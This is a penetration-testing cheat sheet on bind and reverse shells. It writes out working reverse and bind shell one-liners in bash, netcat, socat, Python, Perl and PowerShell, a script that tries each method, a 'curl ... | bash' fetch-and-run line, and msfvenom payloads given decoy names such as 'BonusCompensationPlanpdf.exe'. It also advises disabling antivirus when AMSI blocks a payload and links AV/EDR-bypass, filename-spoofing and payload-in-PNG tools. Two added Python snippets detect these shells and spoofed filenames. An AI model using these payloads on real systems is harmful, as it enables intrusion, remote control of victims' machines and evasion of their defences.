# Bind and Reverse Shell

## Tools

### Online

{% embed url="https://www.revshells.com/" %}

### LazyRevShell

{% embed url="https://github.com/aniqfakhrul/LazyShell" %}
LazyShell
{% endembed %}


### One-Lin3r

{% embed url="https://github.com/D4Vinci/One-Lin3r" %}
One-Lin3r
{% endembed %}

```
pip install one-lin3r
```


### FuegoShell

{% embed url="https://github.com/v1k1ngfr/fuegoshell" %}

## Web Shells

{% content-ref url="/pages/T4JGQDdvKRiioaVzxp5X" %}
[Web Shell](/0xss0rz/pentest/shells/web-shell.md)
{% endcontent-ref %}

## Reverse Shell - Not Web

{% embed url="https://www.revshells.com/" %}
Online - Reverse Shell Generator
{% endembed %}

{% embed url="https://tex2e.github.io/reverse-shell-generator/index.html" %}

{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" %}

{% embed url="https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet" %}

### revshell.sh - Test all methods

```bash
#!/bin/bash

# Replace <YOUR_IP> with your IP address
YOUR_IP="<YOUR_IP>"
PORT=2121

# Attempt to use different methods for a reverse shell
if command -v bash > /dev/null; then
    bash -i >& /dev/tcp/$YOUR_IP/$PORT 0>&1
elif command -v nc > /dev/null; then
    nc $YOUR_IP $PORT -e /bin/bash
elif command -v python3 > /dev/null; then
    python3 -c "import socket,os,pty; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((\"$YOUR_IP\",$PORT)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); pty.spawn(\"/bin/bash\")"
elif command -v python > /dev/null; then
    python -c "import socket,os,pty; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((\"$YOUR_IP\",$PORT)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); pty.spawn(\"/bin/bash\")"
elif command -v perl > /dev/null; then
    perl -e "use Socket; \$i=\"$YOUR_IP\"; \$p=$PORT; socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\")); connect(S,sockaddr_in(\$p,inet_aton(\$i))); open(STDIN,\">&S\"); open(STDOUT,\">&S\"); open(STDERR,\">&S\"); exec(\"/bin/bash -i\");"
else
    echo "No suitable reverse shell method found."
fi
```

```
curl http://IP/revshell.sh|bash
```

### rs-shell - RS in Rust

{% embed url="https://github.com/BlWasp/rs-shell" %}
Rust RS
{% endembed %}

### Secure Reverse Shell

Reverse shell tool that uses AES-GCM (256-bit) encryption and ECDH (Curve P-256) key exchange so that the channel is encrypted and protected.

{% embed url="https://github.com/OusH4x/AESRevShell?tab=readme-ov-file" %}

### FullBypass

Bypass AMSI

{% embed url="https://github.com/Sh3lldon/FullBypass" %}

### rcat

{% embed url="https://github.com/xct/rcat" %}

### RevShellGenerator

A **polymorphic PowerShell reverse shell generator** that produces a unique, heavily obfuscated payload on every run; no two outputs look alike.

{% embed url="https://github.com/Y3llowDuck/OSEP/tree/main/RevShellGenerator" %}

### PowerJoker - Powershell Reverse Shell - Bypass Defender

{% embed url="https://github.com/Adkali/PowerJoker/tree/main" %}

### Over UDP

{% embed url="https://github.com/trickster0/UDPlant" %}

### Attack Host

`nc -nlvp 1234`

### Netcat - Victim

```
# Attacker
nc -nlvp [PORT]

# Victim
## Windows
nc.exe [IP] [PORT] -e cmd.exe
## Linux
nc [IP] [PORT] -e /bin/bash
## if -e option doesn't work
mkfifo /tmp/f; nc <LOCAL-IP> <PORT> < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f
```

#### Netcat traditional

```
# Attacker
nc -nlvp [PORT]

# Victim
nc.traditional -e/bin/sh [IP] [PORT]
```

### Socat - Victim

```
# Attacker
socat TCP-L:<port> -

# Victim
## Windows
socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:powershell.exe,pipes
## Linux
socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:"bash -li"

######################
# Attacker
socat TCP-L:<port> FILE:`tty`,raw,echo=0
# Victim
socat TCP:<attacker-ip>:<attacker-port> EXEC:"bash -li",pty,stderr,sigint,setsid,sane
```

#### Encrypted

```
# 1 - Generate a certificate
openssl req -newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt

# 2 - merge the two created files into a single .pem
cat shell.key shell.crt > shell.pem

#### REVERSE SHELL ####

# 3 - Reverse shell listener
socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0 -

# 4 - Connect back
socat OPENSSL:<LOCAL-IP>:<LOCAL-PORT>,verify=0 EXEC:/bin/bash
```

### Bash - Victim

```
bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1'

bash -c 'sh -i >& /dev/tcp/10.10.14.44/4444 0>&1'

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f

bash -i >& /dev/tcp/<IP>/<PORT> 0>&1

exec 5<>/dev/tcp/<IP>/<PORT>;cat <&5 | while read line; do $line 2>&5 >&5; done

exec /bin/sh 0</dev/tcp/<IP>/<PORT> 1>&0 2>&0

0<&196;exec 196<>/dev/tcp/<IP>/<PORT>; sh <&196 >&196 2>&196
```

### Python - Victim

```
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<IP>",<PORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

### Powershell - Victim

{% hint style="success" %}
*Also Check* [*PowerJoker*](#powerjoker-powershell-reverse-shell-bypass-defender) *and* [*FuegoShell*](#fuegoshell)
{% endhint %}

```powershell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',1234);$s = $client.GetStream();[byte[]]$b = 0..65535|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $data 2>&1 | Out-String );$sb2 = $sb + 'PS ' + (pwd).Path + '> ';$sbt = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sbt,0,$sbt.Length);$s.Flush()};$client.Close()"
```

If you get the following error, the one-liner was flagged by the AV (AMSI) scan:

```cmd-session
At line:1 char:1
+ $client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443) ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent
```

=> Disable AV

{% content-ref url="/pages/3H9JTtBNJqIsmdr4TW9A" %}
[Disable / Remove AV Defender and Firewall](/0xss0rz/pentest/internal-pentest/disable-remove-av-defender-and-firewall.md)
{% endcontent-ref %}

#### Invoke-PowerShellTcp.ps1

{% embed url="https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1" %}

`PS > Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444`
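From the defender's side, the same one-liners are what process telemetry has to catch. The following is an added example, not code from this page or any of the tools it links: one regex per launch pattern from the netcat, socat, bash, Python, Perl and PowerShell sections above, run over constructed sample command-line records (the `<pid> <user> <cmdline>` format is an assumption for the demo).

```python
import re

# Added illustration, not from any product: one regex per launch pattern
# from the one-liners on this page, applied to the recorded command line.
SHELL_RULES = {
    "bash_dev_tcp": re.compile(r"/dev/(?:tcp|udp)/[\w.\-]+/\d+"),
    "nc_exec_flag": re.compile(r"\bnc(?:\.exe|\.traditional)?\b.*-e\s*/?(?:bin/(?:ba)?sh|cmd\.exe)"),
    "mkfifo_nc_pipe": re.compile(r"mkfifo\s+\S+.*\bnc\b"),
    "socat_exec": re.compile(r"\bsocat\b.*\b(?:TCP-L|TCP|OPENSSL-LISTEN|OPENSSL):.*EXEC:", re.I),
    "python_dup2_shell": re.compile(r"python\d?\b.*socket.*dup2.*(?:/bin/(?:ba)?sh|pty\.spawn)"),
    "perl_socket_exec": re.compile(r"\bperl\b.*Socket.*connect\(.*exec\("),
    "powershell_tcp": re.compile(r"(?:TCPClient|TcpListener).*GetStream\(\).*\biex\b", re.I),
}

def classify(cmdline):
    """Names of every rule the command line triggers (empty list = no match)."""
    return [name for name, rx in SHELL_RULES.items() if rx.search(cmdline)]

def scan(lines):
    """Return [(rule_names, line)] for each telemetry line that triggers a rule."""
    return [(classify(line), line) for line in lines if classify(line)]

# Constructed sample telemetry: "<pid> <user> <command line>", one exec per line.
SAMPLE_EXECVE_LOG = """\
1001 www-data bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1'
1002 www-data rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f
1003 alice nc -zv 10.0.0.7 22
1004 www-data socat TCP:10.10.10.10:4444 EXEC:"bash -li",pty,stderr,sigint,setsid,sane
1005 svc python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("10.10.10.10",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
1006 bob python3 manage.py runserver 0.0.0.0:8000
1007 SYSTEM powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',1234);$s = $client.GetStream();$sb = (iex $data 2>&1 | Out-String)"
1008 alice tar -czf backup.tgz /var/www
""".splitlines()

if __name__ == "__main__":
    for names, line in scan(SAMPLE_EXECVE_LOG):
        print(", ".join(names), "<-", line[:70])
```

The benign `nc -zv` port check and the Django `runserver` line are included so the rules can be checked for false positives as well as hits.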

### DLL

{% embed url="https://gitlab.com/0xdf/ctfscripts/-/tree/master/rev_shell_dll?ref_type=heads" %}

### MSFVenom

{% embed url="https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/" %}

```
msfvenom -p <PAYLOAD> <OPTIONS>

Ex:
msfvenom -p windows/x64/shell/reverse_tcp -f exe -o shell.exe LHOST=<listen-IP> LPORT=<listen-port>
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -f msi -o reverse.msi

Payload naming convention: <OS>/<arch>/<payload>
Ex: linux/x86/shell_reverse_tcp

msfvenom --list payloads | grep "linux/x86/meterpreter"

Listener:

msfconsole
use multi/handler
```

#### Linux

```shell-session
$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f elf > createbackup.elf

[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes
Final size of elf file: 194 bytes
```

#### Windows

```shell-session
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f exe > BonusCompensationPlanpdf.exe

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
```

```shell-session
$ msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<InternalIPofPivotHost> -f exe -o backupscript.exe LPORT=8080

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 712 bytes
Final size of exe file: 7168 bytes
Saved as: backupscript.exe
```

```shell-session
msf6 > use exploit/multi/handler

[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https
payload => windows/x64/meterpreter/reverse_https
msf6 exploit(multi/handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf6 exploit(multi/handler) > set lport 8000
lport => 8000
msf6 exploit(multi/handler) > run

[*] Started HTTPS reverse handler on https://0.0.0.0:8000
```

More on: <https://www.revshells.com/>

{% content-ref url="/pages/dtkGhaNT9goTjNNZVnYQ" %}
[Metasploit](/0xss0rz/pentest/tools/metasploit.md)
{% endcontent-ref %}

#### Bypass AV / EDR

{% embed url="https://github.com/murat-exp/EDR-Antivirus-Bypass-to-Gain-Shell-Access?s=03" %}

### Curl

{% embed url="https://github.com/irsl/curlshell" %}

{% embed url="https://danaepp.com/mastering-api-exploitation-crafting-reverse-shells-via-curl" %}

{% embed url="https://github.com/magisterquis/curlrevshell" %}

## Bind Shell - Not Web

{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Bind%20Shell%20Cheatsheet.md" %}

### Netcat - Victim

```
# Victim
nc -lvnp 7777

## Linux
nc -vlp [PORT] -e /bin/bash
## Windows
nc.exe -nlvp [PORT] -e cmd.exe
## if -e option doesn't work
mkfifo /tmp/f; nc -lvnp <PORT> < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f

# Attacker
nc [IP] [PORT]
```

#### Encrypted shell

```
# 1 - Generate a certificate
openssl req -newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt

# 2 - merge the two created files into a single .pem
cat shell.key shell.crt > shell.pem

#### BIND SHELL ####

# copy the PEM file on target

# 3 - Target
socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0 EXEC:cmd.exe,pipes

# 4 - Attacker
socat OPENSSL:<TARGET-IP>:<TARGET-PORT>,verify=0 -
```

### Socat - Victim

```
# Victim
## Windows
socat TCP-L:<PORT> EXEC:powershell.exe,pipes
## Linux
socat TCP-L:<PORT> EXEC:"bash -li"

# Attacker
socat TCP:<TARGET-IP>:<TARGET-PORT> -
```

### Bash - Victim

```bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 1234 >/tmp/f
```

```
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -l 10.129.201.134 1234 >/tmp/f
```

#### Debugging

```
htb-student@ubuntu:~$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 1234 >/tmp/f
nc: getnameinfo: Temporary failure in name resolution
htb-student@ubuntu:~$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 10.129.201.134 1234 >/tmp/f
usage: nc [-46CDdFhklNnrStUuvZz] [-I length] [-i interval] [-M ttl]
	  [-m minttl] [-O length] [-P proxy_username] [-p source_port]
	  [-q seconds] [-s source] [-T keyword] [-V rtable] [-W recvlimit] [-w timeout]
	  [-X proxy_protocol] [-x proxy_address[:port]]
	  [destination] [port]
htb-student@ubuntu:~$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -l 10.129.201.134 1234 >/tmp/f
```

### Python - Victim

```python
python -c 'exec("""import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind(("0.0.0.0",1234));s1.listen(1);c,a=s1.accept();\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())""")'
```

### Powershell - Victim

```powershell
powershell -NoP -NonI -W Hidden -Exec Bypass -Command $listener = [System.Net.Sockets.TcpListener]1234; $listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + " ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();
```

#### Invoke-PowerShellTcp.ps1

{% embed url="https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1" %}

`PS > Invoke-PowerShellTcp -Bind -Port 4444`

### Attack Host

```shell-session
nc -nv 10.129.41.200 7777
```

## Right to left override - Masquerading

{% embed url="https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-techniques/defense-evasion/t1036-masquerading/right-to-left-override" %}

Takes a file (usually an executable) and inserts a Unicode right-to-left override character into its name, so the displayed name hides the real file extension.

{% embed url="https://github.com/HaydoW/RTLO" %}

{% embed url="https://github.com/benjholla/RightToLeftOverrider" %}

{% embed url="https://github.com/henriksb/ExtensionSpoofer" %}
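To spot this trick in a file listing or mail attachment log, check names for bidi control characters and compare the extension a naive renderer shows with the one the OS will actually use. This is an added example, not code from the tools above; the sample filenames are constructed, and the "displayed" form is an approximation of how a renderer honours U+202E.

```python
import unicodedata

# Added illustration: bidi control characters abused for extension spoofing.
# U+202E (RIGHT-TO-LEFT OVERRIDE) is the classic one; the rest are related
# embeddings/overrides/isolates that renderers also honour.
BIDI_CONTROLS = {"\u202a", "\u202b", "\u202c", "\u202d", "\u202e",
                 "\u2066", "\u2067", "\u2068", "\u2069"}

def inspect_filename(name):
    """Return (suspicious, displayed_name, true_extension, controls_found).

    displayed_name approximates what a naive UI shows: text after the first
    U+202E is rendered reversed. true_extension is what the OS actually uses.
    """
    found = [f"U+{ord(ch):04X} {unicodedata.name(ch)}" for ch in name if ch in BIDI_CONTROLS]
    stripped = "".join(ch for ch in name if ch not in BIDI_CONTROLS)
    true_ext = stripped.rsplit(".", 1)[-1].lower() if "." in stripped else ""
    head, rlo, tail = name.partition("\u202e")
    displayed = head + (tail[::-1] if rlo else "")
    displayed = "".join(ch for ch in displayed if ch not in BIDI_CONTROLS)
    return (bool(found), displayed, true_ext, found)

def find_spoofed(filenames):
    """Return the entries that carry bidi controls, with shown vs. real extension."""
    flagged = []
    for name in filenames:
        suspicious, shown, ext, found = inspect_filename(name)
        if suspicious:
            flagged.append({"name": name, "shown_as": shown, "real_ext": ext, "controls": found})
    return flagged

# Constructed sample directory listing (entries 2 and 3 use the RTLO trick).
SAMPLE_FILES = ["report.pdf", "Invoice_\u202efdp.exe", "photo\u202egnp.scr", "notes.txt"]

if __name__ == "__main__":
    for entry in find_spoofed(SAMPLE_FILES):
        print(f"{entry['name']!r} displays as {entry['shown_as']!r} but runs as .{entry['real_ext']}")
```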

## Shell inside a PNG

{% embed url="https://github.com/Maldev-Academy/EmbedPayloadInPng?tab=readme-ov-file" %}

## TTY upgrade

{% content-ref url="/pages/16bwEEpyWa92Oc6gtbya" %}
[TTY Upgrade](/0xss0rz/pentest/shells/tty-upgrade.md)
{% endcontent-ref %}

## Resources

{% embed url="https://0xss0rz.github.io/2020-05-10-Oneliner-shells/" %}

